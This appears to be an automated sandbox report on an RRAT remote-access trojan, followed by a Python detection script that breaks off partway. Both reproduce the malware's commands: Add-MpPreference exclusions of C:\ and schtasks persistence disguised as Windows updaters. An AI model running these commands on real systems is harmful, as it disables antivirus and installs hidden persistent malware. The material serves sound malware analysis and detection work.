Source: unknown | Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown | Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown | Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown | Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown | Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown | Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown | Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown | Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50038 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50059 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process information set: 00 00 00 00
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process information set: 01 00 00 00

System Summary

Source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000010.00000002.4490902100.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, | 0_2_00CA6FAA
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CA848E | 0_2_00CA848E
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CB6CDC | 0_2_00CB6CDC
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CA40FE | 0_2_00CA40FE
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CB4088 | 0_2_00CB4088
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CB00B7 | 0_2_00CB00B7
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CC51C9 | 0_2_00CC51C9
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CB7153 | 0_2_00CB7153
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CB62CA | 0_2_00CB62CA
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CA32F7 | 0_2_00CA32F7
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CB43BF | 0_2_00CB43BF
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CCD440 | 0_2_00CCD440
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CAF461 | 0_2_00CAF461
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CAC426 | 0_2_00CAC426
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CB77EF | 0_2_00CB77EF
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CCD8EE | 0_2_00CCD8EE
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CA286B | 0_2_00CA286B
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CD19F4 | 0_2_00CD19F4
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CAE9B7 | 0_2_00CAE9B7
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CB3E0B | 0_2_00CB3E0B
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CAEFE2 | 0_2_00CAEFE2
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CC4F9A | 0_2_00CC4F9A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E8A825 | 4_2_00E8A825
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E99832 | 4_2_00E99832
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E85017 | 4_2_00E85017
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E859C7 | 4_2_00E859C7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00EA226E | 4_2_00EA226E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E99A61 | 4_2_00E99A61
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00EA6384 | 4_2_00EA6384
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E8B4B3 | 4_2_00E8B4B3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00EA1DC0 | 4_2_00EA1DC0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E855B8 | 4_2_00E855B8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: String function: 00E93AC0 appears 44 times
Source: C:\Users\user\Desktop\rrats.exe | Code function: String function: 00CBF5F0 appears 31 times
Source: C:\Users\user\Desktop\rrats.exe | Code function: String function: 00CBEB78 appears 39 times
Source: C:\Users\user\Desktop\rrats.exe | Code function: String function: 00CBEC50 appears 56 times
Source: rrats.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000010.00000002.4490902100.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: rrat.exe.4.dr, xwAfxDQxndGJirq.cs | Base64 encoded string:
Source: Explorer.exe.5.dr, xwAfxDQxndGJirq.cs | Base64 encoded string:
Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, xwAfxDQxndGJirq.cs | Base64 encoded string:
Source: explore.exe.16.dr, xwAfxDQxndGJirq.cs | Base64 encoded string:
                        Source: Explorer.exe.5.dr, FCIYoaYgcuBXAD.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: Explorer.exe.5.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Explorer.exe.5.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: rrat.exe.4.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: rrat.exe.4.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, FCIYoaYgcuBXAD.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: explore.exe.16.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: explore.exe.16.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: rrat.exe.4.dr, FCIYoaYgcuBXAD.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: explore.exe.16.dr, FCIYoaYgcuBXAD.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@43/19@2/3
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CA6C74 GetLastError,FormatMessageW,0_2_00CA6C74
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CBA6C2
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeFile created: C:\Users\user\AppData\Roaming\Explorer.exeJump to behavior
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\RRAT_nMo7Zfs0N
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_03
Source: C:\Users\user\Desktop\rrats.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
Source: C:\Users\user\Desktop\rrats.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Explorer.exe
Source: C:\Users\user\Desktop\rrats.exe | Command line argument: sfxname (0_2_00CBDF1E)
Source: C:\Users\user\Desktop\rrats.exe | Command line argument: sfxstime (0_2_00CBDF1E)
Source: C:\Users\user\Desktop\rrats.exe | Command line argument: STARTDLG (0_2_00CBDF1E)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Command line argument: B* (4_2_00E92EF8)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Command line argument: sfxname (4_2_00E92EF8)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Command line argument: sfxstime (4_2_00E92EF8)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Command line argument: X+ (4_2_00E92EF8)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Command line argument: STARTDLG (4_2_00E92EF8)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Command line argument: D+ (4_2_00E92EF8)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Command line argument: ~j (4_2_00EA69D0)
Source: rrats.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\rrats.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\rrats.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rrats.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\rrats.exe | File read: C:\Users\user\Desktop\rrats.exe
Source: unknown | Process created: C:\Users\user\Desktop\rrats.exe "C:\Users\user\Desktop\rrats.exe"
Source: C:\Users\user\Desktop\rrats.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe a.exe -p1234
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Explorer.exe C:\Users\user\AppData\Roaming\Explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Explorer.exe "C:\Users\user\AppData\Roaming\Explorer.exe"
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
Source: unknown | Process created: C:\Users\user\AppData\Local\explore.exe C:\Users\user\AppData\Local\explore.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C powershell Add-MpPreference -ExclusionPath C:"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
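The process rows above spell out the whole chain: the outer SFX drops a.bat, a.bat runs the password-protected inner SFX (a.exe -p1234), the unpacked rrat.exe adds a Defender exclusion for C:\ and registers a logon task with /rl highest whose action is C:\Users\user\AppData\Roaming\Explorer.exe, and that dropped Explorer.exe in turn registers two ONIDLE tasks, one for C:\Users\user\AppData\Local\explore.exe and one that re-adds the exclusion. Two quoting quirks are also visible: cmd.exe is invoked as /Cschtasks with no space after the switch, and the task action registered as cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" is the one that actually ran as -ExclusionPath C:" (the trailing backslash swallowed the closing quote). The block below is an added example, not Joe Sandbox code and not part of this report: it runs five triage heuristics over process-creation events constructed from the command lines listed here, keying on the cmdlet, the switch and the target directory rather than on exact paths so both quoting forms still match. The Event and Finding field names, the rule names, the interpreter list and the one-character-deletion lookalike check are assumptions made here for illustration.

```python
"""Triage rules for the process chain recorded in this report.

Added example, not Joe Sandbox code. Runs heuristics over constructed
process-creation events shaped like Sysmon Event ID 1 (Image, ParentImage,
CommandLine). Command lines in SAMPLE_EVENTS are copied from this page; the
field names, rule names and thresholds are assumptions made for illustration.
"""
import re
from dataclasses import dataclass

# Directories a standard user can write to: a task action or a "system" binary
# living here deserves a second look.
USER_WRITABLE = re.compile(r"(?i)\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\")
# Names that only belong under C:\Windows (assumed short list).
SYSTEM_NAMES = {"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                "winlogon.exe", "services.exe"}
INTERPRETERS = r"(?i)^(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)(\.exe)?\b"


@dataclass
class Event:
    image: str
    parent: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _one_deletion_of(name, target):
    """True if name is target with exactly one character removed (explore.exe)."""
    return any(target[:i] + target[i + 1:] == name for i in range(len(target)))


def defender_exclusion(ev):
    # rrat.exe runs: powershell Add-MpPreference -ExclusionPath C:\
    # Matching on the cmdlet, not the path, also catches the mangled C:" form.
    if re.search(r"(?i)add-mppreference\b.*?-exclusion(path|process|extension)\b", ev.cmdline):
        return "Defender exclusion added with Add-MpPreference"


def schtasks_persistence(ev):
    cl = ev.cmdline
    # No leading \b: the wrapper row reads "/Cschtasks /create ..." with no space.
    if not re.search(r"(?i)schtasks(\.exe)?\b.*?/create\b", cl):
        return None
    m = re.search(r"(?i)/tr\s+(.*)$", cl)          # /tr is the last switch in every row above
    action = m.group(1).strip(" '\"") if m else ""
    tn = re.search(r'(?i)/tn\s+"?([^"\s]+)"?', cl)
    highest = bool(re.search(r"(?i)/rl\s+highest", cl))
    if not (USER_WRITABLE.search(action) or re.match(INTERPRETERS, action)):
        return None
    task = tn.group(1) if tn else "?"
    return f"task {task} runs {action!r}" + (" with /rl highest" if highest else "")


def cmd_switch_without_space(ev):
    # "C:\Windows\System32\cmd.exe" /Cschtasks ... : cmd.exe accepts the glued
    # switch, but interactively typed command lines never look like this.
    if _basename(ev.image) == "cmd.exe" and re.search(r'(?i)cmd\.exe"?\s+/[ck](?=\S)', ev.cmdline):
        return "cmd.exe /C switch not followed by a space"


def system_name_outside_windows(ev):
    name = _basename(ev.image)
    if ev.image.lower().startswith("c:\\windows\\"):
        return None
    if name in SYSTEM_NAMES:
        return f"{name} running from {ev.image}"
    for sysname in SYSTEM_NAMES:          # explore.exe would slip past an exact match
        if _one_deletion_of(name, sysname):
            return f"{name} is a lookalike of {sysname}, running from {ev.image}"


def nested_sfx_with_password(ev):
    # a.exe -p1234: a password-protected SFX extracted by another SFX, so the
    # inner payload stays opaque to scanners until it is unpacked at run time.
    if re.search(r"(?i)\\RarSFX\d+\\", ev.image) and re.search(r"(?:^|\s)-p\S+", ev.cmdline):
        return "password-protected SFX launched from a RarSFX temp directory"


RULES = [defender_exclusion, schtasks_persistence, cmd_switch_without_space,
         system_name_outside_windows, nested_sfx_with_password]


def scan(events):
    """Run every rule over every event; one Finding per (event, rule) hit."""
    return [Finding(rule.__name__, ev.image, detail)
            for ev in events for rule in RULES if (detail := rule(ev))]


CMD32 = r"C:\Windows\SysWOW64\cmd.exe"
# Constructed from the command lines listed on this page, plus one benign row.
SAMPLE_EVENTS = [
    Event(r"C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe", CMD32, "a.exe -p1234"),
    Event(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", CMD32,
          "powershell Add-MpPreference -ExclusionPath C:\\"),
    Event(r"C:\Windows\SysWOW64\schtasks.exe", CMD32,
          'schtasks /create /f /sc onlogon /rl highest /tn "Windows\\WindowsUpdater" '
          '/tr \'"C:\\Users\\user\\AppData\\Roaming\\Explorer.exe"\''),
    Event(CMD32, r"C:\Users\user\AppData\Roaming\Explorer.exe",
          r'"C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest '
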